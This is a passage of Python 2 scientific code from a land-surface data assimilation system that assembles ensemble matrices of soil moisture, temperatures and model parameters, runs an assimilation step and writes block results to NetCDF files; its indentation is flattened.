E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[1,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[0,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_SysModel_SubBlock))
E0_ObsModel_SubBlock = numpy.vstack((CLM_Soil_Moisture_Col,E0_ObsModel_SubBlock))
for Soil_Layer_Index in range(5,Soil_Layer_Num - 5,1):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
parm_infl = CLM_Soil_Moisture_parm_infl[0,Mask_Index_Vector]
for Soil_Layer_Index in range(1,Soil_Layer_Num - 5,1):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
# Couple the Soil Temperature to State Vector
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Col = CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Temperature_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Temperature_Col))
parm_infl = numpy.hstack((parm_infl,CLM_Vegetation_Temperature_parm_infl[Mask_Index_Vector]))
parm_infl = numpy.hstack((parm_infl,CLM_Ground_Temperature_parm_infl[Mask_Index_Vector]))
for Soil_Layer_Index in range(Soil_Layer_Num):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
else:
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
parm_infl = CLM_Soil_Moisture_parm_infl[0,Mask_Index_Vector]
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
# Couple the Soil Temperature to State Vector
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Col = CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Temperature_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Temperature_Col))
parm_infl = numpy.hstack((parm_infl,CLM_Vegetation_Temperature_parm_infl[Mask_Index_Vector]))
parm_infl = numpy.hstack((parm_infl,CLM_Ground_Temperature_parm_infl[Mask_Index_Vector]))
for Soil_Layer_Index in range(Soil_Layer_Num):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
elif (Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature"):
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Vegetation_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock, CLM_Ground_Temperature_Ensemble[Mask_Index_Vector, 0:Ensemble_Number]))
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Temperature_Col = CLM_Soil_Temperature_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Temperature_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Temperature_Col))
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
parm_infl = CLM_Surface_Temperature_parm_infl[Mask_Index_Vector]
parm_infl = numpy.hstack((parm_infl,CLM_Vegetation_Temperature_parm_infl[Mask_Index_Vector]))
parm_infl = numpy.hstack((parm_infl,CLM_Ground_Temperature_parm_infl[Mask_Index_Vector]))
for Soil_Layer_Index in range(Soil_Layer_Num):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
# Couple Soil Moisture to State Vector
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
CLM_Soil_Moisture_Col = CLM_Soil_Moisture_Ensemble[Soil_Layer_Index,Mask_Index_Vector,0:Ensemble_Number]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,CLM_Soil_Moisture_Col))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,CLM_Soil_Moisture_Col))
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
parm_infl = numpy.hstack((parm_infl,CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Mask_Index_Vector]))
else:
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r')
print "------------------------- Parameter Definition"
if Soil_Par_Sens_Dim >= 1:
if Def_Print:
print "**********************************************************************Optimize Soil Parameter"
Parameter_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:,Soil_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
Parameter_Col = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
for Ens_Index in range(Ensemble_Number):
Parameter_Col[:,Ens_Index] = Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:].flatten()
#Parameter_Min_Max[Par_Index,0] = numpy.min(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#Parameter_Min_Max[Par_Index,1] = numpy.max(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#print numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index])
#Parameter_Col[:,Ens_Index] = imadjust.imadjust(Parameter_Col[:,Ens_Index],numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index]))
Parameter_Col_Temp = Parameter_Col[Mask_Index_Vector,:]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,Parameter_Col_Temp))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,Parameter_Col_Temp))
del Parameter_Col, Parameter_Col_Temp
Par_Index_Sub += 1
parm_infl_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][Soil_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Soil_Moisture":
parm_infl = CLM_Soil_Moisture_parm_infl[Soil_Layer_Index_DA,Mask_Index_Vector]
elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
parm_infl = CLM_Surface_Temperature_parm_infl[Mask_Index_Vector]
else:
parm_infl = Prop_Grid_Array_Sys_parm_infl[Mask_Index_Vector]
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
parm_infl_Col = parm_infl_Space_SubBlock[Par_Index_Sub,:,:].flatten()
parm_infl = numpy.hstack((parm_infl,parm_infl_Col[Mask_Index_Vector]))
del parm_infl_Col
Par_Index_Sub += 1
del Parameter_Space_SubBlock, parm_infl_Space_SubBlock
if PFT_Par_Sens_Dim >= 1:
if Def_Print:
print "**********************************************************************Optimize PFT Parameter"
#print PFT_Par_Sens,numpy.shape(Parameter_PFT_Space_Ensemble)
Parameter_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,PFT_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
Parameter_Col = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
for Ens_Index in range(Ensemble_Number):
Parameter_Col[:,Ens_Index] = Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:].flatten()
#Parameter_Min_Max[Par_Index,0] = numpy.min(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#Parameter_Min_Max[Par_Index,1] = numpy.max(Parameter_Space_SubBlock[Ens_Index,Par_Index_Sub,:,:])
#print numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index])
#Parameter_Col[:,Ens_Index] = imadjust.imadjust(Parameter_Col[:,Ens_Index],numpy.min(Parameter_Col[:,Ens_Index]),numpy.max(Parameter_Col[:,Ens_Index]),numpy.min(E0_ObsModel_SubBlock[:,Ens_Index]),numpy.max(E0_ObsModel_SubBlock[:,Ens_Index]))
Parameter_Col_Temp = Parameter_Col[Mask_Index_Vector,:]
E0_SysModel_SubBlock = numpy.vstack((E0_SysModel_SubBlock,Parameter_Col_Temp))
E0_ObsModel_SubBlock = numpy.vstack((E0_ObsModel_SubBlock,Parameter_Col_Temp))
del Parameter_Col, Parameter_Col_Temp
Par_Index_Sub += 1
#print "PFT_Par_Sens",PFT_Par_Sens
parm_infl_Space_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][PFT_Par_Sens, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
#print numpy.shape(parm_infl_Space_SubBlock)
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "PFT_Moisture":
parm_infl = CLM_Soil_Moisture_parm_infl[Soil_Layer_Index_DA,Mask_Index_Vector]
elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
parm_infl = CLM_Surface_Temperature_parm_infl[Mask_Index_Vector]
else:
parm_infl = Prop_Grid_Array_Sys_parm_infl[Mask_Index_Vector]
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
parm_infl_Col = parm_infl_Space_SubBlock[Par_Index_Sub,:,:].flatten()
parm_infl = numpy.hstack((parm_infl,parm_infl_Col[Mask_Index_Vector]))
del parm_infl_Col
Par_Index_Sub += 1
del Parameter_Space_SubBlock, parm_infl_Space_SubBlock
NC_File_Out_Assimilation_2_Parameter.close()
#os.abort()
#E0_ObsModel_All = E0_SysModel_All[:,0:Ensemble_Number]
#########################################################################################################################################
PF_PRESSURE_Ensemble_Mat_SubBlock = []
PF_SATURATION_Ensemble_Mat_SubBlock = []
PF_SATURATION_parm_infl_SubBlock = []
if Def_Print:
start = time.time()
print "numpy.size(numpy.where(Observation_Matrix_SubBlock != NAvalue)[0])",numpy.size(numpy.where(Observation_Matrix_SubBlock != NAvalue)[0])
print "numpy.shape(E0_SysModel_SubBlock)[0]",numpy.shape(E0_SysModel_SubBlock)[0]
if numpy.size(numpy.where(Observation_Matrix_SubBlock != NAvalue)[0]) > 0 and numpy.shape(E0_SysModel_SubBlock)[0] > 0:
if Def_Print:
print "numpy.shape(E0_SysModel_SubBlock),numpy.shape(E0_ObsModel_SubBlock),numpy.shape(parm_infl)",numpy.shape(E0_SysModel_SubBlock),numpy.shape(E0_ObsModel_SubBlock),numpy.shape(parm_infl)
print "numpy.min(E0_SysModel_SubBlock),numpy.min(E0_ObsModel_SubBlock),numpy.min(parm_infl)",numpy.min(E0_SysModel_SubBlock),numpy.min(E0_ObsModel_SubBlock),numpy.min(parm_infl)
print "numpy.max(E0_SysModel_SubBlock),numpy.max(E0_ObsModel_SubBlock),numpy.max(parm_infl)",numpy.max(E0_SysModel_SubBlock),numpy.max(E0_ObsModel_SubBlock),numpy.max(parm_infl)
print "numpy.size(numpy.where(Observation_Matrix[Observation_Matrix_Index,::]!= NAvalue))",numpy.size(numpy.where(Observation_Matrix[Observation_Matrix_Index,::]!= NAvalue)[0])
if Def_Print >= 2:
print "E0_SysModel_SubBlock,E0_ObsModel_SubBlock,parm_infl",E0_SysModel_SubBlock,E0_ObsModel_SubBlock,parm_infl
#-----------------------###################### Call CLM_Assim_Common"
Analysis_Grid_SubBlock, Analysis_Grid_Array_SubBlock, Localization_Map_Mask_SubBlock, \
CLM_Ground_Temperature_Ensemble_Mat_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_SubBlock, PF_PRESSURE_Ensemble_Mat_SubBlock, PF_SATURATION_Ensemble_Mat_SubBlock, \
Prop_Grid_Array_Sys_parm_infl_SubBlock, CLM_Latent_Heat_parm_infl_SubBlock, CLM_Surface_Temperature_parm_infl_SubBlock, CLM_Ground_Temperature_parm_infl_SubBlock,CLM_Vegetation_Temperature_parm_infl_SubBlock, CLM_Soil_Moisture_parm_infl_SubBlock,CLM_Soil_Temperature_parm_infl_SubBlock, PF_SATURATION_parm_infl_SubBlock,\
CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock, \
CLM_Surface_Temperature_parm_infl_Bias_SubBlock, CLM_Ground_Temperature_parm_infl_Bias_SubBlock,CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock, CLM_Soil_Moisture_parm_infl_Bias_SubBlock,CLM_Soil_Temperature_parm_infl_Bias_SubBlock, \
Prop_Grid_Array_Bias_SubBlock, Observation_Bias_SubBlock, Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock, Observation_parm_infl_Bias_SubBlock, \
Parameter_Soil_Space_Ensemble_SubBlock, Parameter_Soil_Space_parm_infl_SubBlock, Parameter_Veg_Space_Ensemble_SubBlock, Parameter_Veg_Space_parm_infl_SubBlock, Parameter_PFT_Space_Ensemble_SubBlock, Parameter_PFT_Space_parm_infl_SubBlock, \
Parameter_Hard_Space_Ensemble_SubBlock, Parameter_Hard_Space_parm_infl_SubBlock, Innovation_State_SubBlock, Increments_State_SubBlock = \
CLM_Assim_Common(Block_Index, Model_Driver, Def_PP, Def_First_Run, Def_Print, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, parm_infl, Post_Inflation_Alpha, Def_ParFor, Observation_NLats_SubBlock, Observation_NLons_SubBlock, Ensemble_Number, Ensemble_Number_Predict,
Call_Gstat_Flag, Assim_Algorithm_Name, Model_State_SubBlock, E0_SysModel_SubBlock, E0_ObsModel_SubBlock, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, X_Left_SubBlock, X_Right_SubBlock, Y_Lower_SubBlock, Y_Upper_SubBlock, Proj_String, Z_Resolution,
Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Variable_List,
Grid_Resolution_CEA, Prop_Grid_Array_SubBlock, Prop_Grid_Array_H_Trans_SubBlock, Model_Variance_SubBlock, Write_DA_File_Flag, Mask_SubBlock, Mask_Index_SubBlock, Land_Mask_Data_SubBlock, Observation_Variance_SubBlock, SensorQuantity_Sub, SensorQuantity_Index,
Observation_NLats_SubBlock, Observation_NLons_SubBlock, Observation_Longitude_SubBlock, Observation_Latitude_SubBlock, Observation_Matrix_SubBlock, DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, Soil_Layer_Index_DA, Soil_Layer_Num, ParFlow_Layer_Num, omp_get_num_procs_ParFor,
Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, NSLOTS, DAS_Output_Path, Region_Name,
Variable_Assimilation_Flag, Teta_Residual_SubBlock, Teta_Saturated_SubBlock, Teta_Field_Capacity_SubBlock, Teta_Wilting_Point_SubBlock, SensorType_Sub, SensorVariable_Sub, SensorResolution_Sub, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial,
Observation_Corelation_Par[Observation_Matrix_Index,::], Bias_Estimation_Option_Model, Bias_Estimation_Option_Obs, Low_Ratio_Par, High_Ratio_Par,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
CLM_Ground_Temperature_Ensemble_Mat_SubBlock,CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_SubBlock,CLM_Soil_Temperature_Ensemble_Mat_SubBlock, PF_PRESSURE_Ensemble_Mat_SubBlock, PF_SATURATION_Ensemble_Mat_SubBlock,
Prop_Grid_Array_Sys_parm_infl_SubBlock, [], CLM_Surface_Temperature_parm_infl_SubBlock, CLM_Ground_Temperature_parm_infl_SubBlock,CLM_Vegetation_Temperature_parm_infl_SubBlock, CLM_Soil_Moisture_parm_infl_SubBlock,CLM_Soil_Temperature_parm_infl_SubBlock, PF_SATURATION_parm_infl_SubBlock,
CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock,CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock, CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock,CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock,
CLM_Surface_Temperature_parm_infl_Bias_SubBlock, CLM_Ground_Temperature_parm_infl_Bias_SubBlock,CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock, CLM_Soil_Moisture_parm_infl_Bias_SubBlock,CLM_Soil_Temperature_parm_infl_Bias_SubBlock,
Prop_Grid_Array_Bias_SubBlock, Observation_Bias_SubBlock, Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock, Observation_parm_infl_Bias_SubBlock, Def_CDF_Matching, Plot_Analysis, Parameter_Optimization_Flag,
Start_Month, maxpft, Feedback_Assim, Dim_Soil_Par, Soil_Par_Sens, Dim_Veg_Par, Veg_Par_Sens, Dim_PFT_Par, PFT_Par_Sens, Dim_Hard_Par, Hard_Par_Sens, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Parameter_Soil_Space_Ensemble_SubBlock, Parameter_Soil_Space_parm_infl_SubBlock,
Parameter_Veg_Space_Ensemble_SubBlock, Parameter_Veg_Space_parm_infl_SubBlock, Parameter_PFT_Space_Ensemble_SubBlock, Parameter_PFT_Space_parm_infl_SubBlock, Parameter_Hard_Space_Ensemble_SubBlock, Parameter_Hard_Space_parm_infl_SubBlock, Parameter_Min_Max,
Soil_Layer_Thickness_Ratio, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization,
Par_Soil_Uniform_STD, Par_Veg_Uniform_STD, Par_PFT_Uniform_STD, Par_Hard_Uniform_STD,
Saturation_SSat_SubBlock, Saturation_SRes_SubBlock, Saturation_N_SubBlock, Saturation_Alpha_SubBlock, DateString_Plot, *vartuple)
else:
Analysis_Grid_SubBlock = numpy.mean(Prop_Grid_Array_SubBlock[:, :, :],axis=0)
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Array_SubBlock[Ens_Index,:,:] = Prop_Grid_Array_SubBlock[Ens_Index, :, :]
# if SensorType != "AMSR_E":
# Observation_Matrix[(Sub_Block_Index_Row*Row_Numbers_SubBlock):((Sub_Block_Index_Row+1)*Row_Numbers_SubBlock),(Sub_Block_Index_Col*Col_Numbers_SubBlock):((Sub_Block_Index_Col+1)*Col_Numbers_SubBlock)] = Observation_Matrix_SubBlock
# else:
# Observation_Matrix = Observation_Matrix_SubBlock
#Observation_Matrix = Observation_Matrix_SubBlock
# Compose the Full Analysis Grid
if Def_Print:
end = time.time()
print 'Time of Block',Block_Index,'is: ', (end - start), 'Seconds'
if Def_Print:
print "Before",Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End
if Observation_Box_Row_Index_Start == 0 and Sub_Block_Row_Start > 0:
Observation_Box_Row_Index_Start = Sub_Block_Row_Start
elif Observation_Box_Row_Index_Start > 0:
Observation_Box_Row_Index_Start = Observation_Box
if Observation_Box_Row_Index_End < Row_Numbers:
Observation_Box_Row_Index_End = Observation_NLats_SubBlock - Observation_Box
elif Observation_Box_Row_Index_End == Row_Numbers and Observation_NLats_SubBlock <= Row_Numbers:
Observation_Box_Row_Index_End = Observation_Box_Row_Index_Start + Row_Numbers_SubBlock
if Observation_Box_Col_Index_Start == 0 and Sub_Block_Col_Start > 0:
Observation_Box_Col_Index_Start = Sub_Block_Col_Start
elif Observation_Box_Col_Index_Start > 0:
Observation_Box_Col_Index_Start = Observation_Box
if Observation_Box_Col_Index_End < Col_Numbers:
Observation_Box_Col_Index_End = Observation_NLons_SubBlock - Observation_Box
elif Observation_Box_Col_Index_End == Col_Numbers and Observation_NLons_SubBlock <= Col_Numbers:
Observation_Box_Col_Index_End = Observation_Box_Col_Index_Start + Col_Numbers_SubBlock
if Def_Print:
print "After",Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
Row_Numbers_SubBlock_Patch = Sub_Block_Row_End - Sub_Block_Row_Start
Col_Numbers_SubBlock_Patch = Sub_Block_Col_End - Sub_Block_Col_Start
if Def_Print:
print "Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch",Row_Numbers_SubBlock_Patch,Col_Numbers_SubBlock_Patch
# Record the State Analysis
NC_FileName_Out_Block_Assim = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_"+str(Block_Index+1)+".nc"
if os.path.exists(NC_FileName_Out_Block_Assim):
os.remove(NC_FileName_Out_Block_Assim)
if Def_Print:
print 'Write NetCDF File:',NC_FileName_Out_Block_Assim
NC_File_Out_Block_Assim = netCDF4.Dataset(NC_FileName_Out_Block_Assim, 'w', diskless=True, persist=True, format='NETCDF4')
# Dim the dimensions of NetCDF
NC_File_Out_Block_Assim.createDimension('lon', Col_Numbers_SubBlock_Patch)
NC_File_Out_Block_Assim.createDimension('lat', Row_Numbers_SubBlock_Patch)
NC_File_Out_Block_Assim.createDimension('Soil_Layer_Num', Soil_Layer_Num)
NC_File_Out_Block_Assim.createDimension('ParFlow_Layer_Num', ParFlow_Layer_Num)
NC_File_Out_Block_Assim.createDimension('Ensemble_Number', Ensemble_Number)
NC_File_Out_Block_Assim.createDimension('Dim_CLM_State', Dim_CLM_State)
NC_File_Out_Block_Assim.createDimension('Dim_Soil_Par', Dim_Soil_Par)
NC_File_Out_Block_Assim.createDimension('Dim_Veg_Par', Dim_Veg_Par)
NC_File_Out_Block_Assim.createDimension('Dim_PFT_Par', Dim_PFT_Par)
NC_File_Out_Block_Assim.createDimension('Dim_Hard_Par', Dim_Hard_Par)
NC_File_Out_Block_Assim.createDimension('maxpft', maxpft)
NC_File_Out_Block_Assim.createDimension('Dim_Observation_Quantity', Dim_Observation_Quantity)
NC_File_Out_Block_Assim.createVariable('Prop_Grid_Array_Sys','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Prop_Grid_Array_H_Trans','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
if Parameter_Optimization_Flag:
if Soil_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.createVariable('Parameter_Soil_Space_Ensemble','f4',('Ensemble_Number','Dim_Soil_Par','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Parameter_Soil_Space_parm_infl','f4',('Dim_Soil_Par','lat','lon',),zlib=True)
if PFT_Par_Sens_Dim >= 1:
NC_File_Out_Block_Assim.createVariable('Parameter_PFT_Space_Ensemble','f4',('Ensemble_Number','Dim_PFT_Par','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Parameter_PFT_Space_parm_infl','f4',('Dim_PFT_Par','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Analysis_Grid','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Localization_Map_Mask','f4',('lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Analysis_Grid_Array','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Innovation_State','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('Increments_State','f4',('Ensemble_Number','Dim_CLM_State','lat','lon',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Moisture_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Soil_Temperature_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_Soil_Ice_Ensemble_Mat','f4',('Soil_Layer_Num','lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Vegetation_Temperature_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
NC_File_Out_Block_Assim.createVariable('CLM_Ground_Temperature_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
#NC_File_Out_Block_Assim.createVariable('CLM_2m_Air_Temperature_Ensemble_Mat','f4',('lat','lon','Ensemble_Number',),zlib=True)
